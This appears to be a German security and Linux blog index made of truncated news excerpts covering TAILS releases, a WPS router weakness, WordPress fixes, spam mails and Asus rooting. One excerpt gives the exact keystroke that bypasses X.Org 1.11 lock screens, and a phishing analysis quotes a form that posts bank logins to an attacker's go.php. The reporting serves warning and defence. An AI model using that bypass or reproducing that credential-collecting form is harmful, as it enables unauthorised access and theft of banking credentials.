Laut eigener Aussage handelt es sich bei TAILS 0.10.1 um eine reine Wartungs-Version. Die Entwickler haben Sicherheitslücken und schwere Fehler ausgebessert. Alle Anwender sind angewiesen, so zeitnah wie möglich die Aktualisierungen einzuspielen. Es gibt alledings auch einige Änderungen, die für den Anwender mehr oder weniger direkt sichtbar oder spürbar sind. Die Startseite von Iceweasel ist nun die Standard-Suchmaschine. Scroogle ist den Entwicklern derzeit nicht verlässlich genug. WhisperBack und MAT haben Updates auf 1.5.1 beziehungsweise 0.2.2-2~bpo60+1 spendiert bekommen. In letzterem wurde [...]

Es wurde eine ziemlich fiese Schwachstelle im X.Org Server 1.11 entdeckt. Mit einem einfachen Trick lässt sich der Bildschirmschoner umgehen und man kann sich leicht Zugriff auf den Rechner eines Anwenders verschaffen. Genau genommen muss man lediglich Strg+Alt+<Mal-Taste auf dem Ziffernblock> drücken und man hat den durch einen Bildschirmschoner gesperrten Rechner ausgehebelt. Die stabilen Versionen von Ubuntu liefern in diesem Fall glücklicherweise X.Org Server 1.10 aus und sind nicht betroffen. Allerdings ist Ubuntu 12.04 “Precise Pangolin” anfällig. In einer Nachricht [...]

Ein Blogger ist laut eigener Aussage über einen “komischen Fehler” im X.Org Server gestolpert. Dieser Bug lässt sich ausnutzen, um den Bildschirmschoner eines gesperrten Computers auszuhebeln – physikalischer Zugriff vorausgesetzt. Die meisten Leute sperren ihren Bildschirm, wenn sie den Arbeitsplatz verlassen. Unter GNOME ist zum Beispiel gnome-screensaver und unter KDE kscreenlocker dafür verantwortlich. All diese Programme funktionieren irgendwie gleich. Sie erschaffen ein neues X-Fenster als Vollbild, setzen diese ganz nach vorne im Fenster-Stapel und reissen sämtliche Tastatur- und Maus-Eingaben an [...]

Was kann möglicherweise schief gehen, wenn man eine E-Mail mit folgendem Inhalt bekommt? In der elektronischen Nachricht befindet sich als Anhang eine index.html-Datei. Spätestens wenn man aufgefordert wird, eine TAN via E-Mail zugesendetem Formular einzugeben, sollten alle Alarmglocken läuten. Interessant an der index.html ist, dass Teile des Dokuments tatsächlich von meine.deutsche-bank.de nachgeladen werden. Sieht man sich aber an, wohin das Formular gehen soll … hier könnte der Spruch mit der Nachtigall stehen. <form id=”loginForm” method=”post” action=”http://www.herediabienesraices.com.ar/images/go.php”> Die Domäne herediabienesraices.com.ar scheint [...]

Ab sofort gibt es eine neue Ausgabe der amnesischen Linux-Distribution TAILS. In der offiziellen Ankündigung gehen die Entwickler auf die sichtbaren Änderungen ein. Tor wurde auf Version 0.2.2.35-1 aktualisiert. Dem Browser Iceweasel wurde ein Update aus dem Debian Mozilla Repository auf Version 9.0 spendiert und Torbutton ist als Ausgabe 1.4.5.1-1 vorhanden. Durch das Browser-Update unterstützt die Distribution nun das Ansehen aller YouTube-Videos, die in einem HTML5-Format vorliegen. Third-Party Cookies sind deaktiviert und die Firefox-Erweiterung NoScript haben die Entwickler mit aufgenommen. [...]

Mein guter Freund und Kollege Moritz Jäger hat ein Google-Dokument zur Verfügung gestellt, das als kleine Liste für (nicht-)anfällige Geräte bezüglich der von Stefan Viehböck gefundenen WPS-Lücke in Routern und Access Points dient – klick. Durch eine Design-Schwachstelle in WPS ist es möglich, das System in 4 bis 10 Stunden zu knacken – sofern WPS natürlich aktiviert ist. Das Problem ist, dass bereits die Hälfte der PIN für “gut” befunden werden kann. Somit verringert sich die Anzahl der zu überprüfenden [...]

Die Entwickler der populären CMS- / Blogging-Software WordPress haben Ausgabe 3.3.1 zur Verfügung gestellt. Sie berichten, dass in der neueste Version 15 Probleme aus der Welt geschafft wurden. Ebenso haben die Entwickler eine Sicherheitslücke ausgebessert, die sich für XSS-Angriffe (Cross-Site Scripting) ausnutzen lässt. Andere ausgebesserte Schwierigkeiten enthalten Multi-site Upload Limit ist bei 50 MByte stecken geblieben, ungewollter Backslash in der Ausgabe und ein falsches Zählen der Widgets im Dashboard. Du findest die Liste mit allen behobenen Problemen unter core.trac.wordpress.org. Wer [...]

Das BackBox-Team hat eine neue Version der gleichnamigen Linux-Distribution zur Verfügung gestellt. Einige werden es als Hacker-Distribution bezeichnen. Für andere sind solche Werkzeuge dringend notwendig, um die Sicherheit im eigenen Netzwerk zu gewährleisten. Sicherlich kann man mit solchen Distributionen viel Unsinn anstellen, womit man sich schnell am Rande der Legalität befindet. Benutzt man Sie aber als Abwehr- und Präventions-Tools, hat man eine gute Waffe gegen kriminelle Hacker in der Hand. Die neueste Version basiert auf Ubuntu 11.04, bringt Linux-Kernel 2.6.38 [...]

Normalerweise geb ich ja einen feuchten Dreck auf Mails mit SEO, Linktausch und so weiter. Aber langsam fangen mich Carsten Weiguny (bestereferenzierung.com) und Bettina Knop (bestewebsiteentwicklung.com) zu nerven an. Die Mails sind ziemlich gleich und man verspricht besseres Ranking und so weiter. Die Mails haben sogar Links zu LinkedIn-Profilen, die das Ganze etwas glaubwürdiger machen sollen. Update: Kat O’Connor von SearchEnginesSynergy.com ist der gleiche Mist … Die E-Mails sind in relativ gutem Deutsch (ganz unten angehängt), haben aber kleine Rechtschreibfehler [...]

Also Asus sind echt Spaßbremsen. Da hatte ich mich gefreut wie ein Schnitzel, dass ich nun root-Zugriff auf das Android betriebene EeeTab habe und nur eine Woche später ist er wieder weg. Asus hat nämlich ein Firmware-Update ausgeliefert – 8.6.6.23 und damit eine Sicherheitslücke App Backup ausgenutzt. Diese wurde nun aber von Asus behoben und somit ist auch der schöne root-Zugriff weg – ganz großer Mist … Auf der einen Seite finde ich es ja gut, dass eine Schwachstelle aus [...]